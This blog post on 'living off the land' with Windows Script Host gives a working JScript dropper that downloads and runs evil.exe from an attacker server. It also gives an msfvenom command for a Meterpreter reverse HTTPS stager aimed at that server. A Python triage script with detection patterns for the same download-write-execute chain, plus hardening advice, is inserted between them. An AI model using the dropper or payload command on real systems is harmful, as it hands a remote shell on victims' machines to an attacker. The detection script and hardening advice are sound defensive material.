This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.
When exploiting operating systems and conducting client-side attacks, it is very important to learn to "live off the land". This term refers to using software that is already installed on the target machine and understanding how that software behaves as standard.
In this example we will be covering JScript, a derivative of JavaScript developed by Microsoft that is used in Internet Explorer. It can also be run outside the browser through Windows Script Host (WSH).
When executed outside of a web browser, JScript is not subject to any of the security restrictions enforced by a browser sandbox. This means we can use it as a client-side code execution vector without exploiting any vulnerabilities.
This is very useful, as by default PowerShell scripts (.ps1) are opened by Notepad, meaning that if someone were to open or click on one by mistake it would only display the script's text in Notepad.
Dropper Example
After saving this code as a .js file, all the victim has to do is double-click it and the attacker gets a shell from the victim's machine back to our Metasploit multi/handler listener.
// Fetch the payload with the MSXML2 XMLHTTP COM object (synchronous GET)
var url = "http://192.168.49.60/evil.exe";
var request = WScript.CreateObject('MSXML2.XMLHTTP');
request.Open('GET', url, false);
request.Send();
if (request.Status == 200)
{
    // Write the response body to disk as a binary stream (Type = 1);
    // SaveToFile's second argument 2 means overwrite an existing file
    var stream = WScript.CreateObject('ADODB.Stream');
    stream.Open();
    stream.Type = 1;
    stream.Write(request.ResponseBody);
    stream.Position = 0;
    stream.SaveToFile("evil.exe", 2);
    stream.Close();
}
// Launch the dropped file through WScript.Shell
var r = new ActiveXObject("WScript.Shell").Run("evil.exe");
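From the defender's side, the dropper above is recognisable by the three COM objects it chains together: an HTTP request object to fetch the file, ADODB.Stream to write it to disk, and WScript.Shell to run it. The following Python script is an added example, not part of the original post, that triages .js files for exactly that chain. The indicator table, the normalisation step (which joins split string literals such as "MSX" + "ML2" so simple concatenation does not hide a name) and both sample scripts are constructed for this example; the URL in the sample is a placeholder.

```python
"""Static triage of WSH JScript files for the download-write-execute chain.

Added example, not code from the original post. The indicator names,
the Verdict structure and the two sample scripts are assumptions
constructed for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import List

# One regex per stage of the chain described in the post. COM ProgIDs and
# JScript method names are matched case-insensitively.
INDICATORS = {
    "download": r"MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest",
    "to_disk":  r"ADODB\.Stream|\.SaveToFile\s*\(",
    "execute":  r"WScript\.Shell|Shell\.Application",
    "run_call": r"\.(?:Run|Exec|ShellExecute)\s*\(",
}
URL_RE = re.compile(r"""https?://[^\s"']+""", re.I)


@dataclass
class Verdict:
    stages: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)

    @property
    def is_dropper(self) -> bool:
        # Fetch + write to disk + shell object is the full chain; a script
        # that only reads files or only echoes text never reaches all three.
        return {"download", "to_disk", "execute"} <= set(self.stages)


def normalize(source: str) -> str:
    """Join split string literals ("MSX" + "ML2") and collapse whitespace.

    This defeats only the simplest concatenation trick; scripts built from
    String.fromCharCode or eval'd blobs need dynamic analysis instead.
    """
    joined = re.sub(r"""["']\s*\+\s*["']""", "", source)
    return re.sub(r"\s+", " ", joined)


def triage(source: str) -> Verdict:
    text = normalize(source)
    stages = [name for name, pat in INDICATORS.items() if re.search(pat, text, re.I)]
    return Verdict(stages=stages, urls=URL_RE.findall(text))


# Constructed sample: the post's pattern with a placeholder URL and a split
# ProgID to show the normalisation step at work.
SAMPLE_DROPPER = """
var u = "http://example.invalid/payload.exe";
var req = WScript.CreateObject("MSX" + "ML2.XMLHTTP");
req.Open("GET", u, false); req.Send();
var s = WScript.CreateObject("ADODB.Stream"); s.SaveToFile("p.exe", 2);
new ActiveXObject("WScript.Shell").Run("p.exe");
"""

# Constructed sample: an ordinary admin script that reads a log and echoes it.
SAMPLE_BENIGN = """
var fso = WScript.CreateObject("Scripting.FileSystemObject");
var f = fso.OpenTextFile("app.log", 1);
WScript.Echo(f.ReadAll());
"""

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        v = triage(src)
        print(f"{label}: stages={v.stages} urls={v.urls} dropper={v.is_dropper}")
```

Run it on a directory of mail attachments or a quarantine folder and alert on any file whose verdict reports the full chain; the URL list gives you the hosting server to block or hunt for in proxy logs. Because the post's whole point is that a .js file runs under wscript.exe on double-click, the matching preventive control is to change the default handler for .js and .jse to Notepad, or to block wscript.exe and cscript.exe for ordinary users with AppLocker or WDAC.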
Payload Example
The payload used in the example is a .exe created with msfvenom: a Meterpreter reverse shell stager over HTTPS on port 443. Please note that this file needs to be placed in the web root of the server referenced by the url variable in the dropper.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.60 LPORT=443 -f exe -o evil.exe